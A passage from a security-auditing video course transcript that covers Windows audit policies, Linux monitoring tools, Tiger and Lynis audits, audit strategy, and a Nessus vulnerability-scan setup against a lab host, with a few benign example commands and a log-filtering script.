web server. This way, if the account is hacked, the hacker would have limited capabilities. Also, be sure to
match the permissions with privileges that should be granted. For example, the web application needs to be
able to read the data from the database server.
So create an account that only has read permissions in the database and configure the web application to
access the database with that account. This will limit what the web server software can do with the database. Other
common practices that help create a secure web server environment are to separate your development environment
from your test environment and from your live environment. This is important because your development
environment typically has trace or debug information that can contain sensitive data useful to the hacker. So
place each environment in its own segmented network. Also, be sure to segregate the data.
This means you should store unrelated data in their own databases, so that you can use different database user
accounts for each database and control who has access to the different databases. Security patches fix
known vulnerabilities within software and should be applied on a regular schedule. Be sure to monitor and
audit the server logs. It's important to configure monitoring and auditing on your systems. But also ensure you take
the time to review the logs on a regular basis. And finally, use security tools as part of your day to day
administration. This not only includes security scanners, but network scanners and any lockdown tools for
specific products that will disable unnecessary features of the product. In this video, you learned about web
application auditing.
After completing this video, you will be able to describe how to monitor and audit Windows using audit
policies and the Event Viewer.
Objectives
describe how to monitor and audit Windows using audit policies and the Event Viewer
[Video description begins] Topic title: Windows Security Monitoring and Auditing. Your host for this session
is Glen E. Clarke. [Video description ends]
In this video, you will learn how to monitor and audit Windows using audit policies and the Event Viewer.
Windows systems have an audit policy feature that controls how much logging of security-related events occurs.
You can configure auditing either through the local security policies or deploy the auditing settings to multiple
systems by using group policies within Active Directory. Once you enable auditing for a particular event, you
would then review the audit logs by going to the security log in the Windows event viewer.
No matter the technique used to enable auditing, you do have nine audit policy categories that you can enable
auditing for. For example, account management would be a category. The nine categories are broken down
into 50 different audit policy subcategories. For example, the account management category has subcategories
for enabling auditing of groups as a subcategory or user accounts as a subcategory. Typically, when you set
auditing at a category level, it's then set at the subcategory level by default. This is beneficial in the scenario
where you do not want to go to each subcategory and enable auditing individually, but at the same time, you can go
to those subcategory levels and selectively choose which subcategory to enable auditing for.
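Once auditing is enabled and events are landing in the Security log, the review step can also be scripted. The sketch below assumes the Security log has been exported to CSV from Event Viewer; the file name and column headers are assumptions, and event IDs 4625 (failed logon) and 4740 (account lockout) are just two commonly reviewed examples:

```python
import csv

# Assumes the Security log was exported to CSV from Event Viewer; the file name and
# column headers are assumptions. 4625 (failed logon) and 4740 (account lockout) are
# just two commonly reviewed event IDs.
INTERESTING_EVENT_IDS = {"4625", "4740"}

with open("security-log-export.csv", newline="", encoding="utf-8") as f:
    for row in csv.DictReader(f):
        if row.get("Event ID") in INTERESTING_EVENT_IDS:
            print(row.get("Date and Time"), row.get("Event ID"), row.get("Task Category"))
```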
[Video description begins] Screen title: Top Level Auditing [Video description ends]
Let's take a look at the top level categories that you can enable auditing for. First, we have audit directory
service access which will allow you to audit when somebody accesses Active Directory objects. The benefit of
this category is that if you set this and an application accesses or modifies an object in Active Directory, you'll
know about it in the security log. Next we have audit privilege use. A privilege is a right in Windows. For
example, if you gave somebody the right to shut down a server or change the system time and they took
advantage of those rights, you could have it logged to the security log.
This is a great way to keep an eye on tasks performed by your administrative team. Or more importantly, if
someone hacks an administrative account and then performs administrative tasks, you will know about it if
you've enabled auditing of privileges. We also have the audit policy changes category. This category is used to
log activity related to changes to the security policy of a system. That includes the audit policy itself, but also
security policy settings such as authentication and authorization policy settings. Next we have audit system
events. This category logs system level security events, such as when the state of the security of the system
changes, maybe an IPsec event occurs or there's a system integrity event. Some other event categories that you
have at the top level include audit account logon events. This category is used to log authentication events
against the database holding the account, such as when a user account logs on to Active Directory if you enable this on the domain
controller.
If you enable account logon events on a workstation, then the local SAM database is the account database in question. Next, we
have audit logon events. Logon events are triggered after you've authenticated and when you access a system
from across the network, such as accessing a shared folder on a server. The system you connect to logs a
logon event as it verifies your authentication information. Next we have audit process tracking. This event
category is used to track programs that execute on the system either by the end user or the system itself. Some
examples of subcategories in this category are process creation and process termination which allow you to see
how long the program was running.
Next, we have audit object access. If you want to audit access to objects in Windows such as files, folders,
printers, and registry keys, you can enable audit object access. Note that after you enable audit object access,
you will then go to the specific file, folder, printer, or registry key, to enable auditing on that specific resource.
And finally, we have audit account management. You can enable auditing of account management which
allows you to monitor when somebody modifies properties of an account object such as a user account or a
group. This category has subcategories such as user account management, computer account management,
security group management, and distribution group management, to allow you to fine tune what types of
objects you wish to audit. The account logon event category has a few subcategories that are worth
[Video description begins] Screen title: Account Logon Events [Video description ends]
mentioning. First, we have the credential validation subcategory, which will audit authentication requests to an
Active Directory system using NTLM as the protocol, or authentication to a local SAM database on a Windows
system. Next, we have the Kerberos authentication service. Enabling auditing for this event will audit when a
Kerberos ticket-granting ticket request is received. If enabled on a domain controller, you will see the ticket-
granting ticket request that is part of the logon process, which includes the IP address of the system used to make the
ticket request. We also have the Kerberos service ticket operations subcategory, which allows you to audit when Kerberos
is used to authenticate a user who's trying to access a resource on a system such as a shared folder or a printer.
And finally, we have the other account logon events, which at this time does not have any events that are
audited and is intended for future use. The audit logon events category is broken down into a number of
subcategories.
First, we have logon, which audits when a logon session is created. For interactive logons, the event is logged
on the local computer but when accessing a resource on the network, the event is recorded on the system that
contains the resource. Next we have logoff, which is similar to the logon event as far as where the events are
recorded, but it occurs when a logon session is terminated instead of created. Then we have the account
lockout event, which is used to log when an account cannot log on because the account has been locked out. Next, we have special logon, which is used to audit special logon scenarios such as logon activity
from an account with administrator equivalent privileges or a logon from a special group that you can specify
in the registry. You can also use the other logon/logoff events category to audit things like remote desktop
session connects and disconnects, a workstation being locked or unlocked, and a screen saver being invoked or
dismissed.
Then we have a number of IPSec event categories such as IPSec main mode, which generates events when an
IPSec main mode security association is established. We have IPSec quick mode, which generates events when
IPSec quick mode security associations are established. And then we finally have IPSec extended mode, which
generates events when IPSec extended mode security associations are established. As a final event category,
we have the network policy server subcategory, which allows you to audit events related to RADIUS authentication and Network Access Protection. In this video, you learned how to monitor and audit Windows using audit policies and Event Viewer.
Upon completion of this video, you will be able to describe how to monitor the Linux system by reviewing
system logs.
Objectives
describe how to monitor the Linux system by reviewing system logs
[Video description begins] Topic title: Linux Security Monitoring. Your host for this session is Glen E. Clarke.
Screen title: Linux Security Monitoring Tools [Video description ends]
In this video, you'll learn how to monitor the Linux system by using a number of the tools that exist in Linux.
There are a number of tools available to allow you to monitor different aspects of the Linux system. Because
there are so many different Linux tools used for monitoring, we're dividing them up into the following categories.
First, we have Command line tools. There are a wide range of tools you can access from the terminal and
execute as commands, such as top to view the processes and threads that are running.
We have Log monitoring tools. There are log monitoring tools that you can use to find out the cause of
software errors on the system or server. Network manager tools allow you to diagnose networking issues with
the system, such as determining the settings on the network interfaces. We have Performance monitoring tools.
The Performance monitoring tools allow you to monitor and manage the health and performance of the Linux
system with tools that allow you to monitor things, such as the processor and memory usage. Server
monitoring tools allow you to monitor and maintain servers in your network infrastructure. And finally, we
have Network monitoring tools. Network monitoring tools allow you to monitor characteristics of the network,
such as analyzing network traffic and bandwidth usage.
[Video description begins] Screen title: Command Line Tools [Video description ends]
There are a wealth of different command line tools that are available within different Linux distributions. Some
common tools for monitoring are, first, we have Top. Top comes pre-installed on most Linux distributions and
is a performance monitoring tool that shows memory usage, CPU usage, and characteristics and elements, such
as swap memory, and process information of running processes. PowerTOP is a Linux tool that allows you to
monitor and diagnose problems with power consumption on the system and power management settings. Iotop
is a Python script that shows I/O usage such as disk I/O for processes and threads. And finally, we have Ftptop, which allows you to monitor the FTP sessions with your Linux-based FTP server.
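As a quick illustration (not part of the original narration), here is roughly how a few of these command line tools might be invoked from a terminal; the package names assume a Debian- or Ubuntu-based distribution such as Linux Mint.

top                               # interactive view of running processes, CPU, memory, and swap usage
sudo apt install iotop powertop   # iotop and PowerTOP are often not pre-installed (Debian/Ubuntu package names assumed)
sudo iotop                        # per-process disk I/O usage; typically requires root
sudo powertop                     # power consumption and power management diagnostics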
[Video description begins] Screen title: Network Monitoring Tools [Video description ends]
There are also a number of network monitoring tools used by the many flavors of Linux. Here are a few tools,
first, we have Jnettop, which allows you to monitor network traffic and bandwidth usage. If the Linux system
is acting as a router, Jnettop will allow you to view the routing table of the system. Ntopng is the next
generation version of Ntop and is a tool with a web based GUI that allows you to visually monitor network
usage and traffic. Ethtool is a tool that allows you to manage Ethernet devices, such as obtaining identification
information on the device and diagnostics information.
Ethtool can also be used to control settings on a network interface, such as the speed and duplex settings. And
finally, we have IPTraf. IPTraf is a utility that's used to analyze packet information traveling across the
network. IPTraf can be used to give information, such as byte counts, TCP flag information, ICMP packet
summary, and TCP and UDP summary information, as well.
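For example, ethtool and IPTraf might be used along these lines; eth0 is a placeholder interface name, and the iptraf-ng package is the commonly maintained version of IPTraf.

ethtool eth0                                            # show link status, speed, and duplex for the interface
sudo ethtool -s eth0 speed 100 duplex full autoneg off  # force the interface to 100 Mb/s full duplex
sudo iptraf-ng                                          # launch the interactive IP traffic analyzer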
[Video description begins] Screen title: Server Monitoring Tools [Video description ends]
Any time you're responsible for managing a Linux server, you will most likely need to use some of the server
monitoring tools to troubleshoot and monitor the health of the server. Some common tools for monitoring a
Linux server are, first, we have Linux Dash, which is used to display important server performance
information, such as running processes, CPU and memory usage, file system information and bandwidth used.
Wireshark is an important tool for any network administrator or support person, as it allows you to capture
network traffic and analyze the network packets that are in that packet capture. Glances is a performance
monitoring tool that allows you to monitor the health of your system, including information on processes that
are running, CPU and memory usage, and network bandwidth statistics. Finally, we have Nagios, which is a
third-party tool that allows performance monitoring of not only the Linux system but remote systems such as
Windows machines, routers, switches, and printers.
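As a brief, hedged sketch, Glances can typically be installed and launched like this on a Debian- or Ubuntu-based system; package names may differ on other distributions.

sudo apt install glances   # install the Glances performance monitor
glances                    # interactive view of processes, CPU, memory, file systems, and network usage
glances -w                 # optionally serve the same view over HTTP so it can be viewed in a browser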
[Video description begins] Screen title: Log Monitoring Tools [Video description ends]
Most operating systems log activity to log files such as security events or regular usage activity and Linux is
no different. There are a number of log monitoring tools available for the Linux platform. First, we have Sarg,
which is an HTTP proxy log analyzer that allows you to monitor Internet sites that users are visiting. vnStat is
a free Network Traffic Monitoring tool that analyzes network traffic and keeps a log of network statistics for
the interface that you choose.
GoAccess is a web access log analyzer that monitors web access logs from a number of different products, such
as Apache, Amazon S3 and CloudFront. GoAccess can be used to output summary information and statistics to
a JSON file, an HTML file, or a CSV file. Simple Log Watcher is a tool designed to monitor the system logs
on a Linux system by configuring a regular expression for the content you're interested in, and when a match
occurs in the log, the system administrator is emailed. Logwatch is a Linux monitoring tool that analyzes the
logs and allows you to create a custom report based on the log content.
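To illustrate, GoAccess might be run against a web server access log roughly as follows; the log path and log format shown are assumptions that depend on your web server's configuration.

sudo apt install goaccess                                                    # install GoAccess
goaccess /var/log/apache2/access.log --log-format=COMBINED                  # browse the statistics interactively in the terminal
goaccess /var/log/apache2/access.log --log-format=COMBINED -o report.html   # or write an HTML summary report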
[Video description begins] Screen title: Network Manager Tools [Video description ends]
There are a number of network manager tools that allow you to configure aspects of the networking
environment on a Linux system. First, we have ifconfig, which is used to view and modify the IP configuration
settings on the Linux system. Network Tools is an advanced network diagnostic tool that allows you to
troubleshoot network related issues with your Linux system. Wicd has become the de facto network manager
in many Linux distributions as it allows you to configure many IP settings on the system, including advanced
network settings. And the GNOME Network Manager is a network manager that comes with Ubuntu and the
GNOME desktop environments, it allows you to manage basic network settings, such as the configuration
settings on the network interfaces.
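For instance, ifconfig can be used to view or change interface settings along these lines; eth0 and the addresses are placeholders, and on many modern distributions the newer ip command is preferred.

ifconfig                                               # list all interfaces and their current IP configuration
sudo ifconfig eth0 192.168.1.50 netmask 255.255.255.0  # assign an IPv4 address and subnet mask to eth0
ip addr show                                           # equivalent view using the newer ip command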
[Video description begins] Screen title: Performance Monitoring Tools [Video description ends]
There are a number of performance monitoring tools available in Linux systems that allow you to monitor the
health of the Linux system. First, we have the GNOME System Monitor, which is a Linux task manager that
simplifies viewing information, such as hard disk space usage, RAM usage, and processes that are running.
Sysstat is a performance monitoring tool that consolidates information from many other monitoring tools and
includes information such as CPU, RAM, and swap usage; it monitors sockets and kernel activity as well as
aspects of the file system. VnStat PHP is a network traffic logger that has a web based GUI to analyze network
traffic patterns. And finally, we have Observium. Observium is used to discover devices on the network
including Linux, Windows, and Cisco devices, and provides a graphical environment to monitor the health and
status of all the devices from a centralized tool. In this video, you learned about the Linux monitoring tools.
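As a small follow-on sketch for the sysstat package mentioned above (assuming a Debian- or Ubuntu-style package manager; the sampling intervals are arbitrary examples):

sudo apt install sysstat   # the sysstat package provides sar and related utilities
sar -u 2 5                 # sample CPU utilization five times at two-second intervals
sar -r 2 5                 # sample memory and swap usage the same way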
[Video description begins] Topic title: Linux Security Auditing. Your host for this session is Glen E.
Clarke. [Video description ends]
In this demonstration, we'll take a look at how to install and run Tiger to perform a security assessment of the
Linux system. Tiger is a security tool that assesses the Linux system for security configuration problems by
running a set of scripts that scan the system. Tiger can identify security issues related to accounts, permissions,
ownerships of files, firewall settings, and many other security configuration settings. Let's start by installing
Tiger. I'm on the Linux Mint system here, and down bottom I'm going to click on the terminal window. Once
in the terminal window, let me go and change our View settings here, just so we can see this a little bit better.
[Video description begins] A terminal window labeled "student@LinuxMint:~" opens. The command prompt
in the window reads: student@LinuxMint:~$. [Video description ends]
Here we go. Once in the terminal window, to install Tiger, we're going to use the sudo command and call apt install tiger.
[Video description begins] He enters the following command: sudo apt install tiger [Video description ends]
The Tiger installation only takes a minute. It's a pretty quick install. Once Tiger has completed installation,
now what we want to do is we want to run the Tiger program. So we're going to use sudo tiger. Now what
Tiger does is it has a number of configuration files where it's already configured to scan different aspects of the
Linux system. So it'll go and check things like any security issues related to user accounts, any permission type
of issues, any issues with ownership of files, it'll check firewall settings. So it'll go and scan and do a complete
assessment of your system and write the results to log files. And then you can go and view the log files. Let's
go and run this.
[Video description begins] He enters the following command: sudo tiger [Video description ends]
And you can see here that it's starting to scan: it's checking the password files, checking group files,
checking user accounts. Checking the rhosts file and so on. So this is going to take a few minutes. And then
after that, you can check the log file to see what kind of security issues exist with your system. So I'm going to
pause the video, it'll probably take about four minutes here. So I'm going to pause the video, and then I'll
resume it once it's done. Okay, so the scan is completed. It took probably four or five minutes to complete.
And I just want to kind of scroll up here and take a look at some of the messages that have come up as the
scan was being performed. Because it indicates the types of security checks that it's performing. So you can see
here that it checked the password files, the user accounts, the rhosts file, as I mentioned earlier. But it also checks things like the path settings, checking to see if FTP is set up for anonymous access. It checks our cron
entries. Also, what's kind of nice here is it checks permissions and ownership for any security issues. And then
what I love here is that Tiger also checks for indications of break-ins. So not only is it a security configuration
checker, but it also is an intrusion detection system, so it will check to see if there's any kind of clues or
indications of a security compromise.
As I scroll down here, towards the end, it completes the scan. And then it also tells you that it wrote the results
to a log file, and it gives you the path to the log file. Now every time you run the scan, you'll have a different
log file name because it is based off the date and the time. So what I want to do here is just display the contents of the log file, so I can use the cat command to display the log file. So I'm going to do /var/log/tiger.
Okay, so I specify the path to the log file, hit Enter. And then you can scroll through the log file and view the
results of the scan. So I'm going to go towards the top here. So just a couple examples here, you can see there's
a warning, and they've got a code, boot06 is the code, and then they give you what the message or the
information is that's related to this security issue. So it says, The Grub bootloader configuration file does not
have a password configured. So there's an example of a configuration setting that's not good from a security
point of view. So as you scroll through, you can see the different warnings.
So here's another warning. There are no umask settings for the init.d scripts, right? And so on. So you can
scroll through the results, and kind of see the messages that indicate any kind of security issues that may exist
with this Linux system. So in this demonstration you saw how to run Tiger as a security configuration checker.
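To recap, the entire Tiger workflow from the demonstration boils down to a few commands; the report filename below is a placeholder, since Tiger names each report after the hostname, date, and time of the scan.

sudo apt install tiger                                      # install Tiger
sudo tiger                                                  # run the full set of security assessment scripts
sudo ls /var/log/tiger                                      # list the generated report files
sudo cat /var/log/tiger/security.report.<hostname>.<date>   # view a report; substitute the filename printed at the end of the scan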
After completing this video, you will be able to describe guidelines and standards for defining cyber security
audit strategies.
Objectives
describe guidelines and standards for defining cyber security audit strategies
[Video description begins] Topic title: Cyber Security Audit Strategy. Your host for this session is Glen E.
Clarke. [Video description ends]
In this video, you'll learn about guidelines and standards for defining cyber security audit strategies. The
purpose of a cyber security audit is to provide upper level management with an accurate assessment of the
company security policies and procedures, and their effectiveness to create a secure cyber security posture.
Part of the cyber security audit is to perform a risk assessment, which has a primary goal of communicating the level of risk that exists with all the critical assets within the company. The other goal of the risk assessment is to identify how to respond to risk by creating a risk strategy plan.
This may involve responding by implementing security controls to mitigate the risk, transferring the risk, or even accepting the risk. Organizations will typically perform two types of cyber security audits: an internal audit,
using internal staff to perform the audit, and an external audit that uses a third party company. It's
recommended to do a mix. Now, for example, maybe even every six months you perform an internal audit but
every two years use a third party company and do an external audit. This allows you to save on audit fees but
still have the viewpoint of a third party auditor every few years. With both types of audits, the goal is to obtain
recommendations on how to improve security within the organization.
[Video description begins] Screen title: Cyber Security Responsibilities [Video description ends]
When we talk about cyber security within an organization, cyber security has three critical goals for the
company. The first goal of cyber security within the organization is to protect any sensitive or confidential
data and intellectual property. Using cyber security methodologies you want to protect network resources and
prevent these network resources from being hacked or involved in a security incident. And finally, you want to
ensure there is accountability within your environment including accountability with devices and the data
owned by the organization.
[Video description begins] Screen title: Cyber Security Audit Scope [Video description ends]
When performing your cyber security audit, you want to determine the scope of the audit. Some key areas that
a cyber security audit typically includes are assessing the data security policies for the network, databases, and applications that have been deployed within the organization; reviewing the data loss prevention measures that exist; and looking at the network access controls that have been implemented and other security controls that are in place to protect company assets. You want to review the detection and prevention systems that have been configured to detect and respond to malicious activity. And then finally, you want to review the incident
response program that's been implemented and look for ways to improve it.
[Video description begins] Screen title: Cyber Security Audit Best Practices [Video description ends]
When planning for, or performing a cyber security audit, there are a number of audit best practices that should
be followed. First, be sure that security professionals are properly trained on cyber security and cyber security
threats and incident response. Be sure to take a holistic approach to cyber security threat assessment. In today's
day and age, devices are all interconnected and many appliances have embedded technologies. So be
sure to address the bigger picture and not just one technology.
Auditors should be familiar with credential theft techniques used by hackers such as Pass the Hash, token
impersonation, and man-in-the-middle attacks, where the attacker captures the credentials and then uses those
credentials to authenticate to other systems on the network. Some other important cyber security audit best
practices are cyber security auditors should leverage existing frameworks and guidelines. There are a number
of cyber security and threat assessment guides that have been published by NIST, for instance. For example,
the framework for improving critical infrastructure cyber security that auditors can use as a guidance to make
the audit more manageable. Auditors should look to existing regulations and forthcoming regulations and
incorporate those practices into their audit. For example, the Payment Card Industry Data Security Standard, or
PCI DSS, is a set of security standards for companies that accept, process, or store credit card information.
When performing the threat assessment and determining risk, auditors should always associate a threat with
the vulnerability. The bottom line is that the threat exists because the vulnerability is there and has the potential of being exploited. Remember that the biggest security risk to the organization is the employees. Investing in security awareness training will increase the security knowledge and awareness of the entire organization and, as a result, increase the security posture of the organization. A few other cyber security best practices should be followed. Always remember that the basic security principles still hold true and have been tried and
proven time and time again.
For example, implementing a defense in depth strategy and following the principle of least privilege, is
effective in any environment. It's important to fully test your incident response plan to be sure that everyone
knows their role when an incident occurs. Performing regular tests allows staff to keep the response processes
fresh in their minds, which will decrease the time it takes to respond when an actual incident occurs. The last
point to make is that your cyber security strategy must be agile, meaning that your cyber security strategy must
be adaptable and scalable, because attacks are constantly mutating and new attack methods are constantly
discovered by the hackers. In this video, you learned about defining cyber security audit strategies.
Learn how to compare available security audit tools, outlining their features and benefits.
Objectives
compare available security audit tools and outline their features and benefits
[Video description begins] Topic title: Security Audit Tools. Your host for this session is Glen E. Clarke.
Screen title: Security Audit Tools Goals [Video description ends]
In this video, you will learn about the available security audit tools and their features. There are a number of
different types of security auditing tools with each of the tools being designed for a very specific purpose.
First, we have general security auditing tools, which are tools that will be used to assess the security
configuration of your environment and let you know if you have any settings that are poor security practices.
For example, a security auditing tool may assess the security configuration of your server and determine that
you have too many administrative accounts.
There are tools that can help you perform extensive health scans of your system and provide system hardening
functionality and compliance testing, such as testing for PCI, HIPAA, and SOX compliance. These are known as compliance testing tools. We also have penetration testing tools. There are a number of tools out there that will aid in performing penetration testing, where, as a security professional, you're assessing security by trying to exploit approved targets on your network. We also have vulnerability detection tools. Another common form of security assessment is a vulnerability assessment, where we don't try to exploit the system, but just identify the
vulnerabilities that exist with the systems on the network. And finally, we have system hardening tools that are
used to help lock down your systems by removing unnecessary features or software to limit the attack surface
of the system.
[Video description begins] Screen title: Security Auditing Tools Audience [Video description ends]
There is a wide range of professionals who would use any of the security auditing tools at any point in time.
Developers may use security auditing tools to test vulnerabilities with web applications being developed or
deployed. IT auditors use a number of tools to assess the security posture of a system or network, and then give recommendations on how to improve that security. System administrators can use the security
auditing tools on a daily basis to assess the health of the system or discover new vulnerabilities with the
system. And penetration testers use the tools to discover target systems for the penetration test, identify
weaknesses on those systems and then exploit the systems.
[Video description begins] Screen title: Security Audit Tools [Video description ends]
Let's take a look at some common security auditing tools. First, we have Lynis, which is open source software that can perform health scans, system hardening, and compliance testing of Linux and macOS
systems. Lynis can be used in security audits, compliance testing, vulnerability detection and system
hardening scenarios. Bastille Linux is a Linux hardening utility that helps automate the process of locking
down and hardening your Linux systems. OpenVAS and Nessus are examples of vulnerability scanners. They
discover running software and services on the system, and check those systems against the vulnerability
database for known vulnerabilities and missing patches. And finally, we have Tiger. Tiger's similar to Lynis as
it's a security auditing tool that's used to test the security of your Linux system.
[Video description begins] Screen title: Lynis Features [Video description ends]
Lynis is an up-to-date security auditing tool that has many features. First, it has a vulnerability scanning feature
that allows you to passively discover weaknesses on the system and report them to the auditor. Passive testing is
important as the tool is not actually actively attacking the system in this scenario, it's only assessing the
security.
You can customize the action plan which is the types of tests that are performed by the security tool. A very
cool feature of Lynis is that it can detect traces of an intrusion using heuristic and anomaly detection methods.
And finally, the data is stored in log files, but Lynis has a security dashboard that presents the information in
an easy to read manner. Some other security audit features offered by Lynis to help improve the security of
your environment are as follows. First, Lynis has system hardening services that provide pre-made scripts that can run on
systems and be used to harden those systems, making them more secure.
Lynis provides centralized administration through an interface that allows you to gather and view the security
information from a central screen. Reporting is key to security testing, as managers are going to want to have
some form of output that validates the security posture of the organization. Lynis has security report
capabilities with pre-made reports ready to go. Monitoring the security of your systems is a process that should
never end. So Lynis provides continuous monitoring features that allow for ongoing detection of security
problems. In this video, you learned about the available security audit tools and their features.
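Although the video does not demonstrate it, a minimal sketch of running Lynis from the terminal might look like this, assuming a Debian- or Ubuntu-style package manager (Lynis can also be cloned directly from its Git repository); the log and report paths are the tool's usual defaults.

sudo apt install lynis        # install Lynis from the distribution repositories
sudo lynis audit system       # run a full security audit of the local system
sudo less /var/log/lynis.log  # review the detailed log; a report file is normally written to /var/log/lynis-report.dat as well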
use the Nessus audit tool to run a Nessus security system scan
[Video description begins] Topic title: Nessus Audit Tool. Your host for this session is Glen E. Clarke. [Video
description ends]
In this demonstration, we'll take a look at how you can use Nessus to perform a vulnerability scan of a system
or network. The first thing that I want to point out is that Nessus is either a commercial product that you have
to purchase, or there is a home edition that you could use for personal use on your home network. I'm going to
show you how you can download and use the home edition because it is free. So, to download the Home Edition, we search for Nessus home download.
[Video description begins] The screen displays the Google page in the Mozilla Firefox browser. [Video
description ends]
If we type that into Google it'll go and come up with our results here. And you'll get a link on the Tenable.com
website for the downloads link. So I'm going to click on that, and then you'll choose what it is that you're
trying to download from Tenable. So we do want to go and download Nessus, so
[Video description begins] A page titled "tenable" displays. It displays a list of options including "Nessus",
"Nessus Agents", and " Nessus Network Monitor". Each of the options listed has a "View Downloads" link on
the right. [Video description ends]
we do have the View Downloads link. And when you choose the View Downloads,
[Video description begins] The "Download Nessus" page displays. It lists configuration details. [Video
description ends]
what I want you to notice first off is you do need an activation code. So even with the Home Edition, you will have to fill out a form here, give your email address, and they'll send you an activation code that you'll have to use the first time that you run Nessus. I've already done that; I have my activation code and I've already installed Nessus. So I'm just giving you a quick little tour here of how that was performed. Then you'll go and download the version of Nessus for the platform that you're running. So they do have Nessus for the different platforms, so you can choose to download the one that kind of suits your needs. Once you download it, then you'll have to install it. So to install the software, what we'll do is we'll minimize our browser there, let me go into a
terminal session. Now I am using Kali Linux as my platform to perform my Nessus scan.
[Video description begins] A terminal window titled "root@kali:~" displays. [Video description ends]
So the first thing I want to do, since by default the file downloads to your Downloads folder, is go into the Downloads folder. And again, you can see here that I do have Nessus already downloaded. Now it's also already installed, but
[Video description begins] He types the following command: "cd Downloads" and "ls -l" in the next command
prompt. [Video description ends]
to install it I can use dpkg -i and then specify the package that you want to install. So in our case here, it's going to be Nessus, and then I can hit Enter and it'll start the installation. And then after installation, what you want to do is make sure that the Nessus service is running. So after the installation, to make sure that the service is running, you can use the service nessusd, for daemon, status command. And that will show you what the service status is, and
[Video description begins] He enters the following command: service nessusd status [Video description ends]
we can see here that in my case the service isn't started. So I've done the installation. The service isn't running,
so I do need to start that service. So I can do a service nessusd start to start the service.
[Video description begins] He enters the following command: service nessusd start [Video description ends]
Now once the service is started, what happens is that it runs the Nessus product on a port that you can access
the web administration console for. So by default, the port number is 8834, so at this point, what I'm going to
do is go back to my browser. And let me go into https://127.0.0.1, and again, by default it's port 8834. Now the first time that you run this, what's going to happen is that it's going to go into an initialization and installation kind of phase, where it's installing the plugins, and each plugin gives Nessus the capability to scan
different types of platforms for different types of vulnerabilities. So the next thing that I have to do here, is I
have to login. Now the first time that you run Nessus it does ask you to create a login. So I've already created
my login for my admin account. So I created a user called admin and set a password, so I am going to login.
[Video description begins] The Nessus homepage displays. It contains two tabs "Scans" and "Settings" on the
title bar. Below the title bar are three buttons namely, Import, New Folder, and New Scan. The navigation
pane lists the following options underneath the heading "FOLDERS": My Scans, All Scans, and Trash. And
the options: Policies, Plugin Rules, and Scanners under the heading "RESOURCES". Currently, My Scans is
selected. The page in the main pane labelled "My Scans" displays a list of scans in a table with the following
column headers: Name, Schedule, and Last Modified. [Video description ends]
Now this is what our Nessus screen looks like, you can see the different scans. The My Scans is a folder and
you have the capabilities here to create different folders. So you know if you were maybe doing scans for
different networks on a larger enterprise maybe have different folders for different scans, or maybe organize
the scans by time period, right? So you can create additional folders, and you can see down below here I have
performed a number of scans or a couple of different scans. And if I want to create a new scan or start a new
scan, I hit the New Scan button.
[Video description begins] A page titled "Scan Templates" displays in the main pane. It contains a "Scanner"
tab which has templates listed in the form of tiles such as "Advanced Scan", "Audit Cloud Infrastructure", and
" Badlock Detection". [Video description ends]
Now, with Nessus, when you go to perform a scan, it does have these templates built-in for the different types
of scans that are going to be performed. So for instance, maybe you only use Nessus just to discover systems
on the network and what ports are open on those systems. So they do have a host discovery type of scan, right?
Typically I don't use Nessus for that I'll use something like Nmap to discover my systems, right? And after I've
discovered the systems then I'll go and use Nessus to discover the vulnerabilities on those systems. But the
point being is that there are templates for different types of scans. So what I'm going to do over here is I'm
going to do what we call an advanced scan.
[Video description begins] A page labelled "New Scan/ Advanced Scan" displays. It contains the following
four tabs: Settings, Credentials, Compliance, and Plugins. Currently, the "Settings" tab is selected. On the left,
is a navigation pane with expandable options such as BASIC and DISCOVERY. The "General" section is
further selected in the BASIC section. Various configuration details display on the right of the navigation
pane. These include fields such as "Name", "Description", and "Folder". [Video description ends]
And when I hit the advanced scan, you give the scan a name. So I'm going to call this, Windows 7 Scan 2. You
can fill in the description if you want to, and then you specify the folder that you want to store the scan into. Right, so there's the My Scans folder; I'm going to keep it at that, but again, you could organize your scans into different folders. Then the important part here is you get to specify the targets. Now in this case, I've got a specific
system as a target in mind, so I'm going to plug in the IP address of that system. So it's 192.168.67.130, and
keep in mind you can specify multiple targets. I can hit Enter here, and then I can just list out all the IPs of all
the different systems that I wanted to go and scan. Then up here on the credentials tab, you can specify the
credentials for
[Video description begins] The "Credentials" tab lists the following services underneath the "CATEGORIES"
set to "Host": SNMPv3, SSH, and Windows. [Video description ends]
the different services. So for instance, you know the target is a Windows machine, so if I wanted to specify the credentials of an administrative account and connect to that system using those credentials, I can do that. Now I'm purposely not going to supply credentials, and the reason why is I want to perform the scan as a hacker would see the system, so the hacker doesn't have any credentials. What would the hacker see, right, is kind of what I'm thinking here. And it does mean a lot of times you want to perform your vulnerability scans
multiple times. Once as kind of a guest or an anonymous type of account, and another time as an
administrative account. So that you can kind of discover what somebody with administrative privileges would
be able to see as well.
So again, on purpose here, I'm not going to supply any type of user accounts. Now if I wanted to supply user
accounts, sorry, let me go back to the credentials tab here. I can hit the little add credential button, and what
it'll do is it'll open up a form here where I type in the username and the password and domain name, but again,
I'm not going to do that, so I'm going to close that. And I'm going to go over to our compliance tab here, I don't
have anything that I'm going to set on the compliance tab. So basically Nessus can go and perform
vulnerability scans to adhere to different types of regulations to be compliant, so you can choose some of those
options. What I want to do here is I want to choose my plugins, the plugins are the different types of
vulnerabilities to look for,
[Video description begins] In the "Plugins" tab, there is a table that lists various plugins underneath the
following column headers: STATUS, PLUGIN FAMILY, and TOTAL. The "STATUS" column currently shows
all the listed plugins in the "ENABLED" mode. [Video description ends]
for the different platforms. Now by default, all of the different plugins are enabled, which means that the scan
is going to take quite a bit of time, because it's going to execute
all these plugins looking for all kinds of different vulnerabilities. Now, I specifically know that I'm targeting a
Windows box.
So for this demonstration, just to cut down on the time, what I'm going to do is, well, you can disable these individually by just toggling them off if you wanted to, but what I'm going to do is I'm going to say disable all plugins and I'll go through and I'll just pick a few. So let's say I want to look for backdoors, I want to do brute force attacks, but there's no sense in me choosing any of the Linux plugins when I know the targets are Windows machines in this case. Maybe I'll do denial of service and I'll do DNS. Now, a lot of times when I'm performing a scan, I would leave all the plugins selected, again, unless you knew specifically that the target doesn't run that OS. But a lot of times you are scanning multiple targets at one time. So you'd leave them all enabled, knowing that it will take quite a bit of time; you're adding to the duration of the scan. So I'm just going to choose a few here and I'm going to scroll down and hit my Windows ones. I'm not going to bother with the... maybe I will do SMTP and SNMP, but I want to get down to the Windows ones.
So I do want to enable the web server plugin, the Windows plugin, the Windows Microsoft Bulletin and the
Windows User Management. So I've chosen, I'll say, 5, 6, 7, 8, 9, 10, 11, 11 different plugins, and then I'll hit
the Save button.
